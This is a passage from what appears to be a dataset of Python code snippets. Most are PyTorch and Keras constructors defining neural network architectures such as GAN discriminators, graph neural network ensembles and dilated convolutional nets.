self.conv = nn.Sequential()\n self.mlp = nn.Sequential()\n self.flat = nn.Flatten()\n\n self.conv.add_module(name=f\"e-fconv{0}\", module=_conv2d_block(1, conv_features_sizes[0], kernel_size=3, padding=1))\n self.conv.add_module(name=f\"e-max{0}\", module=nn.MaxPool2d(2, 2))\n for i, (in_size, out_size) in enumerate(zip(conv_features_sizes[:-1], conv_features_sizes[1:]), 1):\n self.conv.add_module(name=f\"e-fconv{i}\", module=_conv2d_block(in_size, out_size, kernel_size=3, padding=1))\n self.conv.add_module(name=f\"e-max{i}\", module=nn.MaxPool2d(2, 2))\n\n mlp_input_shape = int(reduce((lambda x,y: x * y), connector_shape))\n self.mlp.add_module(name=f\"e-linear{0}\", module=nn.Linear(mlp_input_shape, linear_layer_sizes[0]))\n self.mlp.add_module(name=f\"e-batchnorm{0}\", module=nn.BatchNorm1d(linear_layer_sizes[0]))\n self.mlp.add_module(name=f\"e-relu{0}\", module=nn.ReLU())\n for i, (in_size, out_size) in enumerate(zip(linear_layer_sizes[:-1], linear_layer_sizes[1:]), 1):\n self.mlp.add_module(name=f\"e-linear{i}\", module=nn.Linear(in_size, out_size))\n self.mlp.add_module(name=f\"e-batchnorm{i}\", module=nn.BatchNorm1d(out_size))\n self.mlp.add_module(name=f\"e-relu{i}\", module=nn.ReLU())", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, no_antialias=True):\n super(NLayerTFDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n if(no_antialias):\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n else:\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=1, padding=padw), nn.LeakyReLU(0.2, True), Downsample(ndf)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n if(no_antialias):\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n else:\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n Downsample(ndf * nf_mult)]\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=3, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n self.encoder = nn.Sequential(*sequence)\n dim = ndf * nf_mult\n self.transformer_enc = transformer.TransformerDecoders(dim, nhead=4, num_encoder_layers=4, dim_feedforward=dim*2, dropout=0.0)\n\n self.query_embed = nn.Embedding(1, dim)\n self.classifier = nn.Sequential(\n nn.Linear(dim, dim//2),\n nn.LayerNorm(dim//2),\n nn.ReLU(),\n nn.Linear(dim//2, dim//4),\n nn.LayerNorm(dim//4),\n nn.ReLU(),\n nn.Linear(dim//4, 1),\n nn.Sigmoid()\n )", "def __init__(self, fsmt_layer, config):\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([fsmt_layer.self_attn.q_proj.weight, fsmt_layer.self_attn.k_proj.weight, fsmt_layer.self_attn.v_proj.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([fsmt_layer.self_attn.q_proj.bias, fsmt_layer.self_attn.k_proj.bias, fsmt_layer.self_attn.v_proj.bias]))\n self.out_proj_weight = fsmt_layer.self_attn.out_proj.weight\n self.out_proj_bias 
= fsmt_layer.self_attn.out_proj.bias\n self.linear1_weight = fsmt_layer.fc1.weight\n self.linear1_bias = fsmt_layer.fc1.bias\n self.linear2_weight = fsmt_layer.fc2.weight\n self.linear2_bias = fsmt_layer.fc2.bias\n self.norm1_eps = fsmt_layer.self_attn_layer_norm.eps\n self.norm1_weight = fsmt_layer.self_attn_layer_norm.weight\n self.norm1_bias = fsmt_layer.self_attn_layer_norm.bias\n self.norm2_eps = fsmt_layer.final_layer_norm.eps\n self.norm2_weight = fsmt_layer.final_layer_norm.weight\n self.norm2_bias = fsmt_layer.final_layer_norm.bias\n self.num_heads = fsmt_layer.self_attn.num_heads\n self.embed_dim = fsmt_layer.self_attn.embed_dim\n self.is_last_layer = False\n self.validate_bettertransformer()", "def __init__(self):\n super(CustomNetwork, self).__init__()\n self.fc1 = nn.Linear(28*28, 500)\n self.fc2 = nn.Linear(500, 256)\n self.fc3 = nn.Linear(256, 10)\n self.loss = Loss()", "def __init__(\n self, \n dim_feat_raw, \n dim_feat_smooth, \n dim_label_raw, \n dim_label_smooth, \n arch_gnn, \n aug_feat,\n num_ensemble, \n train_params\n ):\n super().__init__()\n self.mulhead = 1\n self.num_layers = arch_gnn[\"num_layers\"]\n self.dropout, self.dropedge = train_params[\"dropout\"], train_params['dropedge']\n self.mulhead = int(arch_gnn[\"heads\"]) # only useful for GAT\n\n self.branch_sharing = arch_gnn['branch_sharing'] # only for ensemble\n\n self.type_feature_augment = aug_feat\n assert dim_feat_raw <= dim_feat_smooth, \"smoothened feature cannot have smaller shape than the original one\"\n # NOTE: dim_label_raw may be larger than dim_label_smooth ==> label is not used as input\n self.num_classes = dim_label_raw\n self.dim_label_in = dim_label_smooth\n self.dim_feat_in = dim_feat_smooth\n self.dim_hidden = arch_gnn['dim']\n # build the model below\n dim, act = arch_gnn['dim'], arch_gnn['act']\n self.aug_layers, self.conv_layers, self.res_pool_layers = [], [], []\n for i in range(num_ensemble):\n # feat aug\n if len(self.type_feature_augment) > 0:\n self.aug_layers.append(nn.ModuleList(\n nn.Linear(_dim, self.dim_feat_in) for _, _dim in self.type_feature_augment\n ))\n # graph convs\n convs = []\n if i == 0 or not self.branch_sharing:\n for j in range(arch_gnn['num_layers']):\n cls_gconv = DeepGNN.NAME2CLS[arch_gnn['aggr']]\n dim_in = (self.dim_feat_in + self.dim_label_in) if j == 0 else dim\n convs.append(cls_gconv(dim_in, dim, dropout=self.dropout, act=act, mulhead=self.mulhead))\n self.conv_layers.append(nn.Sequential(*convs))\n else: # i > 0 and branch_sharing\n self.conv_layers.append(self.conv_layers[-1])\n # skip-pooling layer\n type_res = arch_gnn['residue'].lower()\n type_pool = arch_gnn['pooling'].split('-')[0].lower()\n cls_res_pool = layers.ResPool\n args_pool = {}\n if type_pool == 'sort':\n args_pool['k'] = int(arch_gnn['pooling'].split('-')[1])\n self.res_pool_layers.append(\n cls_res_pool(dim, dim, arch_gnn['num_layers'], type_res, type_pool,\n dropout=self.dropout, act=act, args_pool=args_pool\n ))\n if len(self.aug_layers) > 0:\n self.aug_layers = nn.ModuleList(self.aug_layers)\n self.conv_layers = nn.ModuleList(self.conv_layers)\n self.res_pool_layers = nn.ModuleList(self.res_pool_layers)\n # ------- ensembler + classifier -------\n if num_ensemble == 1:\n self.ensembler = layers.EnsembleDummy()\n else:\n self.ensembler = layers.EnsembleAggregator(dim, dim, num_ensemble, dropout=self.dropout, \n type_dropout=train_params[\"ensemble_dropout\"], act=arch_gnn[\"ensemble_act\"])\n self.classifier = DeepGNN.NAME2CLS['mlp'](dim, self.num_classes, act='I', dropout=0.)\n # 
---- optimizer, etc. ----\n self.lr = train_params[\"lr\"]\n self.sigmoid_loss = arch_gnn[\"loss\"] == \"sigmoid\"\n self.loss, self.opt_op = 0, None\n self.optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n\n self.num_ensemble = num_ensemble", "def __init__(self, Nchannels, Nsamples, output_units):\n super(conv2DNet_1, self).__init__()\n # Layer 1\n l1_channels = 16 \n self.conv1 = nn.Conv2d(1, l1_channels, (Nchannels, 1), padding = 0)\n self.batchnorm1 = nn.BatchNorm2d(l1_channels, False) # final size bsize x 1 x l1_channels x Nsamples\n\n # Layer 2\n l2_channels = 4\n l2_temp_window = 32\n l2_l1channel_overlap = 2\n self.padding1 = nn.ZeroPad2d((l2_temp_window // 2, l2_temp_window // 2 - 1, l2_l1channel_overlap//2-1, l2_l1channel_overlap//2)) # left, right, top, bottom\n self.conv2 = nn.Conv2d(1, l2_channels, (l2_l1channel_overlap, l2_temp_window)) # does not change size if combined with above padding\n self.batchnorm2 = nn.BatchNorm2d(l2_channels, False)\n self.pooling2 = nn.MaxPool2d((2, 4)) # final size bsize x l2_channels x floor(l1_channels/2) x floor(Nsamples/4)\n\n # Layer 3\n l3_channels = 4\n l3_temp_window = 4\n l3_l2channel_overlap = 8\n self.padding2 = nn.ZeroPad2d((l3_temp_window//2, l3_temp_window//2-1, l3_l2channel_overlap//2, l3_l2channel_overlap//2-1))\n self.conv3 = nn.Conv2d(l2_channels, l3_channels, (l3_l2channel_overlap, l3_temp_window))\n self.batchnorm3 = nn.BatchNorm2d(l3_channels, False)\n self.pooling3 = nn.MaxPool2d((2, 4)) # final size bsize x l3_channels x floor(l1_channels/4) x floor(Nsamples/16)\n\n # FC Layer\n fc_inputs = l3_channels * (l1_channels//4) * (Nsamples//16)\n self.fc1 = nn.Linear(fc_inputs, output_units)", "def __init__(self, num_1d=None):\n super(Net, self).__init__()\n\n self.lconv1 = nn.Sequential(\n nn.Conv1d(4, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n nn.Conv1d(64, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n )\n\n self.conv1 = nn.Sequential(\n nn.Conv1d(64, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.Conv1d(64, 64, kernel_size=9, padding=4),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n )\n\n self.lconv2 = nn.Sequential(\n nn.MaxPool1d(kernel_size=4, stride=4),\n nn.Conv1d(64, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n nn.Conv1d(96, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n )\n\n self.conv2 = nn.Sequential(\n nn.Conv1d(96, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n nn.ReLU(inplace=True),\n nn.Conv1d(96, 96, kernel_size=9, padding=4),\n nn.BatchNorm1d(96),\n nn.ReLU(inplace=True),\n )\n\n self.lconv3 = nn.Sequential(\n nn.MaxPool1d(kernel_size=4, stride=4),\n nn.Conv1d(96, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv3 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv4 = nn.Sequential(\n nn.MaxPool1d(kernel_size=5, stride=5),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv4 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv5 = nn.Sequential(\n 
nn.MaxPool1d(kernel_size=5, stride=5),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv5 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv6 = nn.Sequential(\n nn.MaxPool1d(kernel_size=5, stride=5),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv6 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconv7 = nn.Sequential(\n nn.MaxPool1d(kernel_size=2, stride=2),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n )\n\n self.conv7 = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 128, kernel_size=9, padding=4),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n )\n\n self.lconvtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Dropout(p=0.1),\n nn.Conv2d(128, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, 
kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n ]\n )\n\n self.convtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 
32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n ]\n )\n self.final = nn.Sequential(\n nn.Conv2d(64, 5, kernel_size=(1, 1), padding=0),\n nn.BatchNorm2d(5),\n nn.ReLU(inplace=True),\n nn.Conv2d(5, 1, kernel_size=(1, 1), padding=0),\n )\n if num_1d is not None:\n self.final_1d = nn.Sequential(\n nn.Conv1d(128, 128, kernel_size=1, padding=0),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, num_1d, kernel_size=1, padding=0),\n nn.Sigmoid(),\n )\n self.num_1d = num_1d", "def __init__(self, config):\n super(NLayerDiscriminator, self).__init__()\n input_nc = config[\"in_channels\"]\n ndf = config[\"ndf\"]\n n_layers = config[\"n_layers\"]\n use_actnorm = config[\"use_actnorm\"]\n use_spectral = config[\"spectral_norm\"]\n if not use_actnorm:\n norm_layer = nn.BatchNorm2d\n else:\n norm_layer = ActNorm\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine 
parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n\n if use_spectral:\n for i, lay in enumerate(sequence):\n if isinstance(lay, nn.Conv2d):\n sequence[i] = spectral_norm(lay)\n\n self.main = nn.Sequential(*sequence)\n\n weights_init(self.main)", "def __init__(self, slug, num_classes=2, num_filters=128,\n num_filters_fpn=256, upconv=False, pretrained=True, bifpn=False):\n\n super().__init__()\n\n # Feature Pyramid Network (FPN) with four feature maps of resolutions\n # 1/4, 1/8, 1/16, 1/32 and `num_filters` filters for all feature maps.\n if \"eff\" in slug:\n self.fpn = EffFPN(slug=slug, num_filters=num_filters_fpn,\n pretrained=pretrained, bifpn=bifpn)\n else:\n self.fpn = FPN(slug=slug, num_filters=num_filters_fpn,\n pretrained=pretrained, bifpn=bifpn)\n # The segmentation heads on top of the FPN\n\n self.head1 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n self.head2 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n self.head3 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n self.head4 = nn.Sequential(Conv3x3(num_filters_fpn, num_filters),\n Conv3x3(num_filters, num_filters))\n\n self.hm = nn.Conv2d(4 * num_filters, 1, 3, padding=1)\n\n self.classes_embedding = nn.Sequential(\n nn.Conv2d(4 * num_filters, 4 * num_filters, 3, padding=1),\n nn.ReLU(inplace=True))\n\n self.classes = nn.Sequential(\n nn.Dropout(0.5),\n nn.Conv2d(4 * num_filters, num_classes, 1)\n )\n\n if upconv:\n self.up8 = nn.ConvTranspose2d(\n num_filters, num_filters, 8, stride=8)\n self.up4 = nn.ConvTranspose2d(\n num_filters, num_filters, 4, stride=4)\n self.up2 = nn.ConvTranspose2d(\n num_filters, num_filters, 2, stride=2)\n else:\n self.up8 = torch.nn.Upsample(scale_factor=8, mode='nearest')\n self.up4 = torch.nn.Upsample(scale_factor=4, mode='nearest')\n self.up2 = torch.nn.Upsample(scale_factor=2, mode='nearest')", "def gyf_net(\n inputs,\n backbone_layers,\n num_classes,\n option = 1,\n do_dropout = False,\n nd_weights=[ 0, 0, 0.01 , 0.01] ,\n wd_weights=[ 0, 0, 0.01, 0.01],\n name='gyf_net',\n FC_num_of_nuerons = 128\n):\n dropout_param = 0.5\n\n C3, C4, C5 = backbone_layers\n\n if option == 'reg_baseline_c5_dubreshko':\n GlobalAvgPool_features = keras.layers.GlobalAveragePooling2D()(C5)\n FC_regression = keras.layers.Dense(1024, name='FC_regression', activation='relu',\n kernel_regularizer=keras.regularizers.l2(wd_weights[2]),\n activity_regularizer=keras.regularizers.l2(nd_weights[2]))(GlobalAvgPool_features)\n FC_regression2 = keras.layers.Dense(512, name='FC_regression2', activation='relu',\n 
kernel_regularizer=keras.regularizers.l2(wd_weights[3]),\n activity_regularizer=keras.regularizers.l2(nd_weights[3]))(FC_regression)\n\n outputs = keras.layers.Dense(1, name='regression')(FC_regression2)\n\n if option== 'reg_baseline_c5':\n GlobalAvgPool_features = keras.layers.GlobalAveragePooling2D()(C5)\n FC_regression = keras.layers.Dense(1024, name='FC_regression', activation='relu')(GlobalAvgPool_features)\n if do_dropout:\n FC_regression = keras.layers.Dropout(dropout_param)(FC_regression)\n\n FC_regression2 = keras.layers.Dense(512, name='FC_regression2', activation='relu')(FC_regression)\n if do_dropout:\n FC_regression2 = keras.layers.Dropout(dropout_param)(FC_regression2)\n\n outputs = keras.layers.Dense(1, name='regression')(FC_regression2)\n\n if option== 'reg_fpn_p3':\n p3 = create_p3_feature(C3, C4, C5)\n GlobalAvgPool_features = keras.layers.GlobalAveragePooling2D()(p3)\n FC_regression = keras.layers.Dense(128, 